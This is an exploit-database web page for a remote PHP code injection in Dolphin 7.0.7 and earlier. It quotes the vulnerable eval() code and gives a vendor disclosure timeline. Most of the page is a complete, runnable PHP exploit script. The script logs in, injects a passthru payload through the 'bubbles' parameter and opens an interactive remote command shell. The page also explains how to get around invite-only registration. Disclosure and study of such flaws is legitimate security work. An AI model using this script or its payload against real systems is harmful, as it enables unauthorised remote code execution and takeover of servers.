Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Dolphin - exploit.company
header-logo
Suggest Exploit
vendor:
Dolphin
by:
EgiX
7.5
CVSS
HIGH
Remote PHP Code Injection
Unknown
CWE
Product Name: Dolphin
Affected Version From: 7.0.0
Affected Version To: 7.0.7
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Dolphin <= 7.0.7 (member_menu_queries.php) Remote PHP Code Injection Exploit

This exploit takes advantage of a vulnerability in the member_menu_queries.php file of the Dolphin software version 7.0.7 or below. By manipulating the 'bubbles' parameter in the URL, an attacker can inject arbitrary PHP code into the server.

Mitigation:

Upgrade to a patched version of Dolphin software (7.0.8 or later).
Source

Exploit-DB raw data:

<?php

/*
    ----------------------------------------------------------------------------
    Dolphin <= 7.0.7 (member_menu_queries.php) Remote PHP Code Injection Exploit
    ----------------------------------------------------------------------------
    
    author...............: EgiX
    mail.................: n0b0d13s[at]gmail[dot]com
    software link........: http://www.boonex.com/dolphin
    affected versions....: from 7.0.0 to 7.0.7
    
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] vulnerable code in /member_menu_queries.php
    
    61.                case 'get_bubbles_values' :
    62.                    $sBubbles = ( isset($_GET['bubbles']) ) ?  $_GET['bubbles'] : null;
    63.                    if ( $sBubbles && $iMemberId ) {
    64.    
    65.                        $aMemberInfo  = getProfileInfo($iMemberId);
    66.                        if($aMemberInfo['UserStatus'] != 'offline') {
    67.                            // update the date of last navigate;
    68.                            update_date_lastnav($iMemberId);
    69.                        }
    70.    
    71.                        $aBubbles = array();
    72.                        $aBubblesItems = explode(',', $sBubbles);
    73.    
    74.                        if ( $aBubblesItems && is_array($aBubblesItems) ) {
    75.                            $bClearCache = false;
    76.                            foreach( $aBubblesItems as $sValue)
    77.                            {
    78.                                $aItem   = explode(':', $sValue);
    79.    
    80.                                $sBubbleCode = null;
    81.                                foreach($aMenuStructure as $sKey => $aItems)
    82.                                {
    83.                                    foreach($aItems as $iKey => $aSubItems)
    84.                                    {
    85.                                        if( $aSubItems['Name'] == $aItem[0]) {
    86.                                            $sBubbleCode = $aSubItems['Bubble'];
    87.                                            break;
    88.                                        }
    89.                                    }
    90.    
    91.                                    if ($sBubbleCode) {
    92.                                        break;
    93.                                    }
    94.                                }
    95.    
    96.                                if ($sBubbleCode) {
    97.                                    $sCode  = str_replace('{iOldCount}', $aItem[1], $sBubbleCode);
    98.                                    $sCode  = str_replace('{ID}', $iMemberId, $sCode);
    99.    
    100.                                   eval($sCode);
    
    When handling 'get_bubbles_values' action, input passed through $_GET['bubbles'] isn't properly sanitized
    before being used in a call to eval() at line 100, this can be exploited to inject arbitrary PHP code.
    Successful exploitation of this vulnerability requires authentication, but is always possible to create a
    new account also if 'REGISTRATION BY INVITATION ONLY' is enabled, in this case an attacker could bypass
    the restriction visiting first /index.php?idFriend=1 and after point to /join.php for a new registration.
    
    
    [-] Disclosure timeline:
    
    [25/09/2011] - Vulnerability discovered
    [26/09/2011] - Issue reported to http://www.boonex.com/forums/topic/PHP-Code-Injection.htm
    [26/09/2011] - A moderator hide the topic
    [29/09/2011] - Vendor contacted again through http://www.boonex.com/help/contact
    [04/10/2011] - Vendor replied that there is a designated place for this kind of report: "Dolphin Bug Reports" forum
    [04/10/2011] - I replied that I've already posted in this forum, but the topic has been hidden
    [05/10/2011] - Vendor reply: "It may has been hidden because it WASN'T posted in the proper place"
    [05/10/2011] - My reply: "It has been hidden for security reason, the moderator told me to report the issue through http://www.boonex.com/help/contact"
    [08/10/2011] - Vendor replied that a patch will be released as soon as possible
    [13/10/2011] - Vendor update released: http://www.boonex.com/n/dolphin-7-0-8-beta-1
    [18/10/2011] - Public disclosure
    
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die( "\n[-] No response from {$host}:80\n");
    
    fwrite($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+------------------------------------------------------------+";
print "\n| Dolphin <= 7.0.7 Remote PHP Code Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";

if ($argc < 5)
{
    print "\nUsage......: php $argv[0] <host> <path> <username> <password>\n";
    print "\nExample....: php $argv[0] localhost / user pass";
    print "\nExample....: php $argv[0] localhost /dolphin/ user pass\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$payload = "ID={$argv[3]}&Password={$argv[4]}";
$packet  = "POST {$path}member.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
    
if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) die("\n[-] Login failed!\n");

$phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])";
$packet  = "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
    print "\ndolphin-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/\r\n\r\n(.*)\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");
}

?>

Navigation

Suggest Exploit

Services By CQR